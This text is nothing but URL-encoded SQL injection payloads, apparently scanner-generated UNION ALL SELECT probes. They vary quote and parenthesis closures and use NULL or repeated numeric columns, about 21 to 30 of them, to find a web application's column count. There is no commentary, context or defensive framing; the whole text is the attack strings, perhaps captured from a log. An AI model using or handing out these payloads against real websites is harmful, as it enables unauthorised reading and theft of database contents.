1234.5%27%2B%28SELECT%20tzZB%20WHERE%204016%3D4016%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20dnhl%20WHERE%201339%3D1339%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27eUYp%27%20WHERE%205875%3D5875%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27cVnL%27%20WHERE%202924%3D2924%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27aCMH%27%20WHERE%208837%3D8837%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27Xujr%27%20WHERE%202089%3D2089%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27QZSI%27%20WHERE%209801%3D9801%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27oZuX%27%20WHERE%204060%3D4060%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27BQQI%27%20WHERE%209797%3D9797%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27Jznl%27%20WHERE%205815%3D5815%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27hmzL%27%20WHERE%207297%3D7297%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27PWhW%27%20WHERE%205764%3D5764%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -2095%29%20UNION%20ALL%20SELECT%202797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797%2C2797--%20 -7476%29%20UNION%20ALL%20SELECT%209872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872--%20 -8193%29%20UNION%20ALL%20SELECT%209907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907--%20 -9221%29%20UNION%20ALL%20SELECT%204885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885%2C4885--%20 -7970%29%20UNION%20ALL%20SELECT%201807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807%2C1807--%20 -3107%29%20UNION%20ALL%20SELECT%203149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149%2C3149--%20 -8700%29%20UNION%20ALL%20SELECT%203801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801%2C3801--%20 -9860%29%20UNION%20ALL%20SELECT%208416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416--%20 -8928%29%20UNION%20ALL%20SELECT%209190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190--%20 -3961%29%20UNION%20ALL%20SELECT%202915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915%2C2915--%20 -5844%27%29%20UNION%20ALL%20SELECT%209846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846%2C9846--%20 -7260%27%29%20UNION%20ALL%20SELECT%201418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418%2C1418--%20 -8546%27%29%20UNION%20ALL%20SELECT%208200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200--%20 -1438%27%29%20UNION%20ALL%20SELECT%208568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568--%20 -9365%27%29%20UNION%20ALL%20SELECT%209404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404--%20 -3603%27%29%20UNION%20ALL%20SELECT%205002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002%2C5002--%20 -2279%27%29%20UNION%20ALL%20SELECT%205118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118--%20 -8603%27%29%20UNION%20ALL%20SELECT%209158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158--%20 -3020%27%29%20UNION%20ALL%20SELECT%201455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455%2C1455--%20 -4442%27%29%20UNION%20ALL%20SELECT%209801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801--%20 -8335%27%20UNION%20ALL%20SELECT%206766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766--%20 -3647%27%20UNION%20ALL%20SELECT%206712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712%2C6712--%20 -2764%27%20UNION%20ALL%20SELECT%205607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607--%20 -1071%27%20UNION%20ALL%20SELECT%205969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969%2C5969--%20 -6936%27%20UNION%20ALL%20SELECT%204701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701--%20 -7697%27%20UNION%20ALL%20SELECT%204079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079--%20 -1954%27%20UNION%20ALL%20SELECT%204926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926--%20 -5029%27%20UNION%20ALL%20SELECT%204122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122--%20 -6262%27%20UNION%20ALL%20SELECT%208241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241%2C8241--%20 -3172%27%20UNION%20ALL%20SELECT%207605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605%2C7605--%20 -7528%22%20UNION%20ALL%20SELECT%207142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142%2C7142--%20 -4613%22%20UNION%20ALL%20SELECT%201803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803--%20 -4523%22%20UNION%20ALL%20SELECT%206574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574%2C6574--%20 -3743%22%20UNION%20ALL%20SELECT%205633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633--%20 -4469%22%20UNION%20ALL%20SELECT%209154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154--%20 -2587%22%20UNION%20ALL%20SELECT%205094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094--%20 -3124%22%20UNION%20ALL%20SELECT%207358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358%2C7358--%20 -3018%22%20UNION%20ALL%20SELECT%209592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592--%20 -6333%22%20UNION%20ALL%20SELECT%207175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175%2C7175--%20 -5625%22%20UNION%20ALL%20SELECT%209688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688--%20 -6372%29%20UNION%20ALL%20SELECT%208955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955%2C8955--%20 -1924%29%20UNION%20ALL%20SELECT%209882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882--%20 -3124%29%20UNION%20ALL%20SELECT%205179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179--%20 -7045%29%20UNION%20ALL%20SELECT%202260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260--%20 -6139%29%20UNION%20ALL%20SELECT%207835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835%2C7835--%20 -5016%29%20UNION%20ALL%20SELECT%204762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762%2C4762--%20 -7264%29%20UNION%20ALL%20SELECT%207582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582--%20 -8667%29%20UNION%20ALL%20SELECT%207127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127%2C7127--%20 -1027%29%20UNION%20ALL%20SELECT%202768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768%2C2768--%20 -6100%29%20UNION%20ALL%20SELECT%203375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375--%20 -6979%29%29%20UNION%20ALL%20SELECT%206434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434--%20 -7957%29%29%20UNION%20ALL%20SELECT%202698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698%2C2698--%20 -4583%29%29%20UNION%20ALL%20SELECT%204503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503%2C4503--%20 -3750%29%29%20UNION%20ALL%20SELECT%204759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759%2C4759--%20 -8088%29%29%20UNION%20ALL%20SELECT%204722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722%2C4722--%20 -2905%29%29%20UNION%20ALL%20SELECT%202476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476%2C2476--%20 -8807%29%29%20UNION%20ALL%20SELECT%208826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826--%20 -8761%29%29%20UNION%20ALL%20SELECT%207252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252--%20 -6956%29%29%20UNION%20ALL%20SELECT%208637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637--%20 -7501%29%29%20UNION%20ALL%20SELECT%207647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647%2C7647--%20 -5740%29%29%29%20UNION%20ALL%20SELECT%207221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221--%20 -5870%29%29%29%20UNION%20ALL%20SELECT%201669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669--%20 -6779%29%29%29%20UNION%20ALL%20SELECT%204145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145%2C4145--%20 -8624%29%29%29%20UNION%20ALL%20SELECT%209561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561%2C9561--%20 -1416%29%29%29%20UNION%20ALL%20SELECT%205166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166--%20 -1552%29%29%29%20UNION%20ALL%20SELECT%207356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356--%20 -8369%29%29%29%20UNION%20ALL%20SELECT%202393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393--%20 -3076%29%29%29%20UNION%20ALL%20SELECT%206095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095%2C6095--%20 -6216%29%29%29%20UNION%20ALL%20SELECT%206715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715--%20 